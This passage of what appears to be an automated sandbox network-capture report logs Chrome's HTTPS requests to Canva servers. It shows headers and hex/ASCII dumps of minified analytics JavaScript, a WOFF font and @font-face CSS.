                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 61 63 6b 5f 64 69 73 70 61 74 63 68 65 72 5f 75 73 65 64 22 29 2c 61 2e 53 67 61 2e 64 69 73 70 61 74 63 68 28 62 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 50 68 28 22 66 61 6c 6c 62 61 63 6b 5f 64 69 73 70 61 74 63 68 65 72 5f 75 73 65 64 22 29 2c 61 2e 53 67 61 2e 64 69 73 70 61 74 63 68 28 62 29 7d 7d 2c 57 64 62 3d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 28 6e 65 77 20 44 61 74 65 28 61 2e 54 61 2e 6e 6f 77 28 29 29 29 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 2c 64 3d 6e 65 77 20 42 64 62 28 7b 65 76 65 6e 74 73 3a 62 2e 6d 61 70 28 65 3d 3e 7b 61 3a 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65
                                                                                                                                                                                                                                                    Data Ascii: ack_dispatcher_used"),a.Sga.dispatch(b)}catch(e){return null===c||void 0===c?void 0:c.Ph("fallback_dispatcher_used"),a.Sga.dispatch(b)}},Wdb=async function(a,b){const c=(new Date(a.Ta.now())).toISOString(),d=new Bdb({events:b.map(e=>{a:switch(e.type){case
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 41 31 28 62 2e 55 42 61 29 2c 0a 67 74 6d 5f 62 65 6e 5f 36 30 35 3a 41 31 28 62 2e 51 42 61 29 2c 67 74 6d 5f 64 69 63 62 6f 3a 41 31 28 62 2e 52 42 61 29 2c 67 74 6d 5f 66 70 63 5f 72 74 69 64 3a 41 31 28 62 2e 54 42 61 29 2c 67 74 6d 5f 6d 65 74 61 64 61 74 61 3a 41 31 28 62 2e 56 42 61 29 7d 7d 29 7d 2c 62 65 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 59 64 2c 63 3d 61 2e 4c 70 2c 64 2c 65 2c 66 3b 76 61 72 20 67 3d 7b 61 70 70 5f 6e 61 6d 65 3a 6e 75 6c 6c 3d 3d 3d 28 64 3d 63 2e 61 70 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 6e 61 6d 65 2c 70 72 6f 64 75 63 74 5f 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 63 2e 61 70 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65
                                                                                                                                                                                                                                                    Data Ascii: A1(b.UBa),gtm_ben_605:A1(b.QBa),gtm_dicbo:A1(b.RBa),gtm_fpc_rtid:A1(b.TBa),gtm_metadata:A1(b.VBa)}})},beb=function(a){var b=a.Yd,c=a.Lp,d,e,f;var g={app_name:null===(d=c.app)||void 0===d?void 0:d.name,product_variant:null===(e=c.app)||void 0===e?void 0:e
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 73 74 61 74 75 73 29 3b 7d 72 65 74 75 72 6e 7b 6e 65 74 77 6f 72 6b 3a 7b 73 74 61 74 75 73 3a 61 7d 7d 7d 72 65 74 75 72 6e 7b 7d 7d 3b 5f 5f 63 2e 67 50 2e 70 72 6f 74 6f 74 79 70 65 2e 4c 5a 3d 5f 5f 63 2e 4e 59 28 33 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 74 68 69 73 2e 4b 5a 28 61 2c 62 29 3b 72 65 74 75 72 6e 28 64 2c 65 29 3d 3e 63 28 76 6f 69 64 20 30 2c 64 2c 65 29 7d 29 3b 0a 5f 5f 63 2e 6c 50 2e 70 72 6f 74 6f 74 79 70 65 2e 4c 5a 3d 5f 5f 63 2e 4e 59 28 32 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 77 64 62 28 74 68 69 73 2c 61 2c 62 29 3b 72 65 74 75 72 6e 28 64 2c 65 29 3d 3e 63 28 76 6f 69 64 20 30 2c 64 2c 65 29 7d 29 3b 5f 5f 63 2e
                                                                                                                                                                                                                                                    Data Ascii: d 0===d?void 0:d.status);}return{network:{status:a}}}return{}};__c.gP.prototype.LZ=__c.NY(3,function(a,b){const c=this.KZ(a,b);return(d,e)=>c(void 0,d,e)});__c.lP.prototype.LZ=__c.NY(2,function(a,b){const c=wdb(this,a,b);return(d,e)=>c(void 0,d,e)});__c.
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 73 65 74 28 29 3b 72 65 74 75 72 6e 20 62 7d 63 61 74 63 68 28 62 29 7b 74 68 72 6f 77 20 74 68 69 73 2e 53 33 2b 2b 2c 74 68 69 73 2e 53 6a 61 3d 74 68 69 73 2e 54 61 2e 6e 6f 77 28 29 2c 74 68 69 73 2e 53 33 3e 3d 74 68 69 73 2e 4c 7a 61 26 26 28 74 68 69 73 2e 73 74 61 74 65 3d 31 29 2c 62 3b 7d 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 54 61 3d 0a 5f 5f 63 2e 70 61 3b 74 68 69 73 2e 53 6a 61 3d 74 68 69 73 2e 53 33 3d 74 68 69 73 2e 73 74 61 74 65 3d 30 3b 74 68 69 73 2e 61 63 74 69 6f 6e 3d 61 3b 74 68 69 73 2e 4c 7a 61 3d 33 3b 74 68 69 73 2e 65 4a 61 3d 33 45 34 7d 7d 3b 76 61 72 20 46 64 62 3d 32 2c 45 64 62 3d 34 2c 47 64 62 3d 38 3b 76 61 72 20 6b 65 62 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 6f 70 65 6e 28 61 29 7b 63 6f
                                                                                                                                                                                                                                                    Data Ascii: set();return b}catch(b){throw this.S3++,this.Sja=this.Ta.now(),this.S3>=this.Lza&&(this.state=1),b;}}constructor(a){this.Ta=__c.pa;this.Sja=this.S3=this.state=0;this.action=a;this.Lza=3;this.eJa=3E4}};var Fdb=2,Edb=4,Gdb=8;var keb=class{static open(a){co
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 73 79 6e 63 20 66 6c 75 73 68 28 29 7b 76 61 72 20 61 3d 61 77 61 69 74 20 4b 64 62 28 74 68 69 73 2e 73 74 6f 72 65 2c 0a 74 68 69 73 2e 75 73 65 72 49 64 29 3b 61 3d 58 64 62 28 61 29 3b 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 61 2e 6d 61 70 28 62 3d 3e 57 64 62 28 74 68 69 73 2c 62 29 29 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 3d 52 64 62 28 29 2c 6b 3d 5f 5f 63 2e 70 61 29 7b 74 68 69 73 2e 73 74 6f 72 65 3d 61 3b 74 68 69 73 2e 53 67 61 3d 62 3b 74 68 69 73 2e 63 72 3d 63 3b 74 68 69 73 2e 50 63 3d 64 3b 74 68 69 73 2e 4c 3d 65 3b 74 68 69 73 2e 52 62 3d 66 3b 74 68 69 73 2e 75 73 65 72 49 64 3d 67 3b 74 68 69 73 2e 47 5a 3d 68 3b 74 68 69 73 2e 54 61 3d 6b 3b 76 61 72 20 6c 3b 74 68 69 73
                                                                                                                                                                                                                                                    Data Ascii: sync flush(){var a=await Kdb(this.store,this.userId);a=Xdb(a);await Promise.all(a.map(b=>Wdb(this,b)))}constructor(a,b,c,d,e,f,g,h=Rdb(),k=__c.pa){this.store=a;this.Sga=b;this.cr=c;this.Pc=d;this.L=e;this.Rb=f;this.userId=g;this.GZ=h;this.Ta=k;var l;this


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    25192.168.2.449768104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC624OUTGET /web/images/b46630e470f4040eba7033cf2435edce.woff HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://static.canva.com/web/19jbs9.2447b447994aff36.ltr.css
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1351INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: font/woff
                                                                                                                                                                                                                                                    Content-Length: 1136
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0e7cfb41f9-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1865552
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "b46630e470f4040eba7033cf2435edce"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Fri, 08 Nov 2024 01:01:22 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sun, 09 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: zzMjQ/02zZcDiH8J3dmB4Gv0Ve+Wk/0ilQ6Q11NjBE0OWbZCTSMaPQl3xMdGrI00uGdKjnwWMO0=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: GPA61DT9DZ219NF8
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: J.O4OWECSBNmdxMplE_xpWR.wwgbMUM5
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC777INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 47 79 67 52 36 5f 67 69 2e 31 4c 5a 57 57 47 31 34 6d 2e 66 32 79 68 57 49 58 75 79 34 76 54 43 69 55 4f 61 43 73 46 67 37 57 63 2d 31 37 33 34 36 34 33 36 34 37 2d 31 2e 30 2e 31 2e 31 2d 32 4e 41 61 6c 36 48 57 70 78 41 32 45 77 43 61 56 6b 78 63 38 69 7a 49 61 33 4d 6a 75 41 78 59 56 73 72 4e 6d 4e 4f 39 46 53 49 53 2e 48 75 6b 36 44 72 4a 65 64 59 79 44 5a 4e 4f 6a 31 76 78 61 58 45 61 43 44 64 50 63 56 72 42 65 30 6c 6a 6a 66 4a 75 45 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 32 37 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=GygR6_gi.1LZWWG14m.f2yhWIXuy4vTCiUOaCsFg7Wc-1734643647-1.0.1.1-2NAal6HWpxA2EwCaVkxc8izIa3MjuAxYVsrNmNO9FSIS.Huk6DrJedYyDZNOj1vxaXEaCDdPcVrBe0ljjfJuEg; path=/; expires=Thu, 19-Dec-24 21:57:27 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC610INData Raw: 77 4f 46 46 4f 54 54 4f 00 00 04 70 00 0d 00 00 00 00 06 2c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 46 46 20 00 00 03 18 00 00 00 eb 00 00 00 f0 03 8b 26 a6 46 46 54 4d 00 00 04 28 00 00 00 1c 00 00 00 1c 8c c0 d0 84 47 44 45 46 00 00 04 04 00 00 00 1a 00 00 00 1e 00 27 00 08 4f 53 2f 32 00 00 01 8c 00 00 00 47 00 00 00 60 58 80 62 a3 63 6d 61 70 00 00 02 c8 00 00 00 37 00 00 01 42 00 0d 02 e8 68 65 61 64 00 00 01 30 00 00 00 33 00 00 00 36 13 17 ee 8d 68 68 65 61 00 00 01 64 00 00 00 1d 00 00 00 24 03 ae 01 6f 68 6d 74 78 00 00 04 20 00 00 00 08 00 00 00 08 01 48 00 48 6d 61 78 70 00 00 01 84 00 00 00 06 00 00 00 06 00 02 50 00 6e 61 6d 65 00 00 01 d4 00 00 00 f1 00 00 01 c8 9d d1 72 b4 70 6f 73 74 00 00 03 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii: wOFFOTTOp,CFF &FFTM(GDEF'OS/2G`Xbcmap7Bhead036hhead$ohmtx HHmaxpPnamerpost
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC526INData Raw: 3f 11 f7 cc 5b 9c a9 f0 ec 63 1f da 73 ef 09 3b 8c 18 a8 4e 31 52 11 68 ed 50 41 18 b7 7c b7 ae 73 dd f1 96 5c ae 64 14 7e 42 43 ab 71 98 76 63 6c 83 75 95 d8 ad fd 9f 4e 76 ae 6c 4a 27 75 73 6f cf 03 f3 88 13 fb 69 2f 4b ef e4 5e fd c6 b4 13 0e 21 9e ba 71 b0 22 75 25 22 f6 8e e1 0f c6 b9 41 69 00 00 00 78 9c 63 60 60 60 66 80 60 19 06 46 06 10 b0 01 f2 18 c1 7c 16 06 05 20 cd 02 84 20 be e3 ff ff 10 f2 ff 01 a8 4a 06 46 36 06 18 93 7c 40 b1 01 03 0b 00 7d bb 06 f4 00 78 9c 63 60 66 00 83 ff cd 0c 46 40 8a 91 01 0d 00 00 28 55 01 b9 00 00 78 9c 45 8c 21 4f c3 40 1c 47 7f ff b6 5c 93 72 6c d0 a3 0d 81 c3 2c 24 24 48 14 5f a0 0a 8d 6d 32 c8 b2 2c 99 20 64 a1 82 13 f3 07 16 73 82 4c 22 97 54 20 76 9f 60 66 0a bd 6f d1 5b 3b 18 c3 c0 53 cf bc 47 08 02 10 51
                                                                                                                                                                                                                                                    Data Ascii: ?[cs;N1RhPA|s\d~BCqvcluNvlJ'usoi/K^!q"u%"Aixc```f`F| JF6|@}xc`fF@(UxE!O@G\rl,$$H_m2, dsL"T v`fo[;SGQ


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    26192.168.2.449769104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC825OUTGET /_fb/s/41d36c36b634199c0ebf5e807fda38d0.css HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1352INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                    Content-Length: 35234
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0f3a23425c-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 2044425
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "e09e2e1fc340201f46c6b422ba600d5a"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:27 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 28 May 2024 05:01:57 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: aWkibxSB0D2psh3WvTi45jRg8SxIViHozktv0ZPWKIUWYBt0Vsllc6a/vrQzLzT+HjuLH+9GqiAG2E3Ziz415izN/sJc2/3N
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 2SR1W285E8C87V9C
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: .LwsDALTLPPbe12hNbmuW5TcVaOT13Xr
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yzv09U0%2FMRblR1Zgydjug9Vmpu2TmdbnnwoE4Iv5QDHHFlofRienPsMPpUAoomc4Z7yjeBNdrCsSwWtOO9nRo673U031O4SQdqbnVsPGIsqBkI6ZptsdnqbGjKpWBdJ%2Fd6au3QtTgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 32 31 33 38 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74
                                                                                                                                                                                                                                                    Data Ascii: @font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/05.woff) format
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 33 38 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63
                                                                                                                                                                                                                                                    Data Ascii: 38,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 100; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/05.woff) format("woff"), url(https://font-public
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 35 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22
                                                                                                                                                                                                                                                    Data Ascii: _"; font-display: swap; font-weight: 300; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/05.woff) format("woff"), url(https://font-public.canva.com/_fb/0/05.ttf) format("
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 68 74 3a 20 36 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d
                                                                                                                                                                                                                                                    Data Ascii: ht: 600; font-style: normal; src: url(https://font-public.canva.com/_fb/0/02.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/02.woff) format("woff"), url(https://font-public.canva.com/_fb/0/02.ttf) format("truetype")}@font-face {unicode-
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 30 32 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 32 31 33 38 2c 55 2b 32 31 33 61 2d 66 66 66 64 3b 20 66 6f 6e 74
                                                                                                                                                                                                                                                    Data Ascii: url(https://font-public.canva.com/_fb/0/02.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/02.woff) format("woff"), url(https://font-public.canva.com/_fb/0/02.ttf) format("truetype")}@font-face {unicode-range: U+0-2138,U+213a-fffd; font
